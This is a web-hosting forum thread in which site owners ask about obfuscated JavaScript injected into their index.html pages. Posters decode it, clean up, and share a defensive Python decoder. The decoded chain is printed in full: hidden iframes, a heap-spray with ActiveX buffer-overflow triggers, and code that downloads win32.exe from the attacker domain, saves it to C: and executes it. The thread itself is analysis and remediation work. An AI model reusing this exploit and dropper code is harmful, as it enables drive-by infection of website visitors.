What is this malicious injected code all about?
I've seen this a few times in the last couple of months. What does this code do that someone is injecting into the index.html code of many sites? I've cleaned it out before, only to have it return again a month later. Why and how are they injecting this code?
This is what it looks like. It seemed to try to run Outlook Express on one site; on the other, nothing seemed to happen: <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67%2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
Unescape() and escape() can be used to encode/decode parts of a script or URL or so on.
It looks to me initially that it is trying to send some data to the hacker via e-mail.
In your case it's:
document.write('<iframe src=http://softspydelete.com/strong/050/ width=1 height=1></iframe>');
Fun with hex.
Quote:
Your code converts to this: <script>eval(unescape(document.write('<iframe src=http://softspydelete.com/strong/050/ width=1 height=1></iframe>');));</script>
Interesting, thanks for the replies.
It's on a shared account. Is there anything I should do as a user to protect against it (permissions or something)? Or is it something that the server admin should be taking care of? What could a hacker possibly be hoping to achieve by injecting that into many index files? (I noticed the same code in other accounts on the same server.)
Interesting too: the whois for that domain shows a Russian owner with a Turkish IP.
http://softspydelete.com/strong/050/ (Points to the below)
[hex-encoded script omitted; the decoded form follows]
( below is how it breaks down )
--------------
var aTDnc='®wa1"£Ū&1<html><body><style> * {CURSOR: url("324123.html")} </style><iframe src="e1.html" width="1" height="1"></iframe></body></html>:¾hhaW'
eval(unescape('var q1Gpy = ''; var MV5v = aTDnc.slice ( 18, 274 ); for ( c6 = 18 ; c6 < 274 ; c6 += 2 ){q1Gpy += '%' + aTDnc.slice ( c6, c6 + 2 );}document.write(unescape(q1Gpy));'));</script>
-----
Now ( 324123.html )
[binary dump of 324123.html omitted: RIFF/ACON animated-cursor data]
------
And ( e1.html )
<html> <body><div id="mydiv"></div><Script Language='JavaScript'> var mm = new Array(); var mem_flag = 0; function h() {mm=mm; setTimeout("h()", 2000);} function getb(b, bSize) {while (b.length*2<bSize){b += b;} b = b.substring(0,bSize/2);return b;} function cf() {var zc = 0x05050505; var a = unescape("[%u-encoded shellcode blob omitted]"); var heapBl2ckSize = 0x400000; var pls = a.length * 2; var bSize = heapBl2ckSize - (pls+0x38); var b = unescape("%u0505%u0505"); b = getb(b,bSize); heapBl2cks = (zc - 0x400000)/heapBl2ckSize; for (i=0;i<heapBl2cks;i++) {mm[i] = b + a;}
mem_flag = 1; return mm; } function startWVF() { for (i=0;i<128;i++) { try{ var tar = new ActiveXObject('WebVi'+'ewFol'+'de'+'rIc'+'on.WebVi '+'ewFol'+'derI'+'con.1'); d = 0x7ffffffe; b = 0x05050505 tar.setSlice(d, b, b, b ); }catch(e){} } } function startWinZip(object) { var xh = 'A'; while (xh.length < 231) xh+='A'; xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c"; object.CreateNewFolderFromName(xh); } function startOverflow(num) { try { var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+' ewFol'+'derI'+'con.1'); if (tar) { if (! mem_flag) cf(); startWVF(); } } catch(e) { } } function GetRandString(len) { var chars = "abcdefghiklmnopqrstuvwxyz"; var string_length = len; var randomstring = ''; for (var i=0; i<string_length; i++) { var rnum = Math.floor(Math.random() * chars.length); randomstring += chars.substring(rnum,rnum+1); } return randomstring; } function CreateObject(CLSID, name) { var r = null; try { eval('r = CLSID.CreateObject(name)') }catch(e){} if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "")') }catch(e){} } if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} } if (!r) { try {s=1; eval('r = CLSID.GetObject("", name)') }catch(e){} } if (!r) { try {s=1; eval('r = CLSID.GetObject(name, "")') }catch(e){} } if (!r) { try {s=1; eval('r = CLSID.GetObject(name)') }catch(e){} } return(r); } function XMLHttpDownload(xml, url) { try { xml.open("GET", url, false); xml.send(null); } catch(e) { return 0; } return xml.responseBody; } function AD2BDStreamSave(o, name, data) { try { o.Type = 1; o.Mode = 3; o.Open(); o.Write(data); o.SaveToFile(name, 2); o.Close(); } catch(e) { return 0; } return 1; } function ShellExecute(exec, name, type) { if (type == 0) { try { exec.Run(name, 0); return 1; } catch(e) { } } else { try { exe.ShellExecute(name); return 1; } catch(e) { } } return(0); } function MD2C() { var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', 
'{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null); var v = new Array(null, null, null); var i = 0; var n = 0; var ret = 0; var urlRealExe = 'http://softspydelete.com/dl/050/win32.exe'; while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) { var a = null; try { a = document.createElement("object"); a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); } catch(e) { a = null; } if (a) { if (! v[0]) { v[0] = CreateObject(a, "msxml2.XMLHTTP"); if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP"); if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP"); } if (! v[1]) { v[1] = CreateObject(a, "ADOD"+"B.Str"+"eam"); } if (! v[2]) { v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell"); if (! v[2]) { v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on"); if (v[2]) n=1; } } } i++; } if (v[0] && v[1] && v[2]) { var data = XMLHttpDownload(v[0], urlRealExe); if (data != 0) { var name = "c:\\sys"+GetRandString(4)+".exe"; if (AD2BDStreamSave(v[1], name, data) == 1) { if (ShellExecute(v[2], name, n) == 1) { ret=1; } } } } return ret; } function start() { if (! MD2C() ) { startOverflow(0); } } start(); </script></body> </html> |
OK, so the short version is: a trojan (installer) using ActiveX to sneak onto the system, disguised as a Windows system file?!
Awesome follow-through.
So, anyone have any theories as to what they would be trying to achieve with this? I just went and checked another server at a completely different data center and found the same code (or similar code; I deleted it before analyzing it exactly).
That IFRAME loads a page that executes an exploit that uploads a trojan... it's much better to redirect to a 3rd-party page in case you want to update your exploit code. Nasty shit; I dealt with something similar a few weeks ago and had to cleanse several thousand pages :)
Quote:
Is the code hard-written into the page (like, do you see it by FTP or only by browser)?
The code is hard-written into my index.html files on completely separate datacenters.
---------------------------------------------------------
http://softspydelete.com
softspydelete.com. NS 3600 ns2.trdns.biz.
softspydelete.com. NS 3600 ns1.trdns.biz.
softspydelete.com. A 3600 88.255.90.253
----------------
Searching for ns1.trdns.biz. A record at B.ROOT-SERVERS.NET. [192.228.79.201] ...took 156 ms
Searching for ns1.trdns.biz. A record at A.GTLD.biz. [209.173.53.162] ...took 93 ms
Searching for ns1.trdns.biz. A record at NS2.trdns.biz. [88.255.90.252] ...took 120 ms
A record found: 88.255.90.251
Domain Type TTL Answer
ns1.trdns.biz. A 3600 88.255.90.251
----------------
----------------
Searching for ns1.trdns.biz. A record at E.ROOT-SERVERS.NET. [192.203.230.10] ...took 177 ms
Searching for ns1.trdns.biz. A record at H.GTLD.biz. [199.7.77.126] ...took 10 ms
Searching for ns1.trdns.biz. A record at ns1.trdns.biz. [88.255.90.251] ...took 120 ms
A record found: 88.255.90.251
Domain Type TTL Answer
ns1.trdns.biz. A 3600 88.255.90.251
----------------
Quote:
Perhaps a rootkit to attack other systems, or perhaps spam...
Quote:
I have been getting this code for about a month now and have only just resolved the issue with Webair's help. If you simply remove the code from your index pages it comes back; it did with me anyway. I think it came from an exploit in a script I was using; I have removed the script and remade all affected web pages and it's fine so far, fingers crossed :thumbsup
Spudman, how exactly did this code get onto Webair servers to begin with?
Quote:
The scripts I was running on my box were: e107, comus, TM3, TTTv4 and some photo gallery software. Maybe it came through one of those. I've checked and amended the permissions on all my pages, and also renamed all the templates that come with the scripts (I should have done this before anyway, just lazy :) ), and so far I seem clean again.
Perhaps someone attached some miscellaneous code to an image file?
Running a virus scanner on your server might be a good idea... :upsidedow Later,
I remember similar code infecting tonnes of sites out there. It reinfects HTML pages within days if cleaned.
I was under the impression that it happens because of a vulnerability in the Windows virtual machine, but I am not sure how to prevent it. Does anyone know what causes this and how to fix it? Keep in mind that it propagates via the internet. <script language="JavaScript">e = '0x00' + '56';str1 = "%ED%B5%BE%A3%C9%A4%A5%AE%BD%B2%EA%F7%A3%BE%A4%BE%B7%BE%BD%BE%A5%AE%EF%B1%BE%B5%B5%B2%BB%F7%EB%ED%BE%B3%A7%B6%BA%B2%C9%A4%A7%B4%EA%F7%B1%A5%A5%B9%EF%F8%F8%A7%BE%BC%B8%B4%BB%A5%FB%BE%BB%B3%B8%F8%BD%B5%F8%B0%A7%B2%AE%F8%F7%C9%A0%BE%B5%A5%B1%EA%E6%C9%B1%B2%BE%B0%B1%A5%EA%E6%EB%ED%F8%BE%B3%A7%B6%BA%B2%EB%ED%F8%B5%BE%A3%EB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
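As an added example (not code from any poster in this thread), here is an eval-free Python decoder for the two obfuscated injections quoted above: the eval(unescape('%64...')) one in the opening post and the XOR-and-offset one in the post just above. It reads the hidden iframe URL out of each without ever running the script in a browser; the payload strings are copied from the thread with the forum's line-wrap spaces removed.

```python
import re

# Constructed copies of the two obfuscated injections quoted in this thread,
# with the spaces the forum's line wrapping inserted removed.
HEX_PAYLOAD = (
    "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20"
    "%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65"
    "%2e%63%6f%6d%2f%73%74%72%6f%6e%67%2f%30%35%30%2f%20%77%69%64%74%68%3d%31"
    "%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b"
)
XOR_PAYLOAD = (
    "%ED%B5%BE%A3%C9%A4%A5%AE%BD%B2%EA%F7%A3%BE%A4%BE%B7%BE%BD%BE%A5%AE%EF%B1"
    "%BE%B5%B5%B2%BB%F7%EB%ED%BE%B3%A7%B6%BA%B2%C9%A4%A7%B4%EA%F7%B1%A5%A5%B9"
    "%EF%F8%F8%A7%BE%BC%B8%B4%BB%A5%FB%BE%BB%B3%B8%F8%BD%B5%F8%B0%A7%B2%AE%F8"
    "%F7%C9%A0%BE%B5%A5%B1%EA%E6%C9%B1%B2%BE%B0%B1%A5%EA%E6%EB%ED%F8%BE%B3%A7"
    "%B6%BA%B2%EB%ED%F8%B5%BE%A3%EB"
)
XOR_KEY = int("0x00" + "56", 16)  # the script builds e = '0x00' + '56', i.e. 86


def js_unescape(s: str) -> str:
    """Static stand-in for JavaScript unescape(): %XX -> U+00XX, %uXXXX -> U+XXXX."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_xor_stage(payload: str, key: int) -> str:
    """Replays the loop (unescape(triple).charCodeAt(0) ^ e) - 127 without running it."""
    return "".join(chr((ord(js_unescape(payload[i:i + 3])) ^ key) - 127)
                   for i in range(0, len(payload), 3))


def decode_eval_unescape(page_html: str) -> list:
    """Pulls every eval(unescape('...')) body out of a page and returns it decoded."""
    return [js_unescape(b) for b in re.findall(r"eval\(unescape\('([^']*)'\)\)", page_html)]


def iframe_sources(html: str) -> list:
    """Lists iframe src values in decoded markup: the URLs to block and to grep the server for."""
    return re.findall(r"""<iframe\s+src=["']?([^\s"'>]+)""", html, flags=re.I)


if __name__ == "__main__":
    for stage in (js_unescape(HEX_PAYLOAD), decode_xor_stage(XOR_PAYLOAD, XOR_KEY)):
        print(stage, "->", iframe_sources(stage))
```

Both decode to a 1x1 hidden iframe pointing at a third-party host, which is the string to search every index.html on the account for rather than the encoded blob, since the encoding changes between infections.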
I had the same problem for a while; it is usually inserted via a database on your own server. Secure the data sources or remove unused ones, and clear the index.html.
I worked with SplitInfinity to solve my problem; hit up your host and check with them to get it flushed.
Goddamn that is sneaky.
IDK, hmmm, I have NO idea???? Good question.
I think it is an iframe that injects the code and resides as a .js file on the server.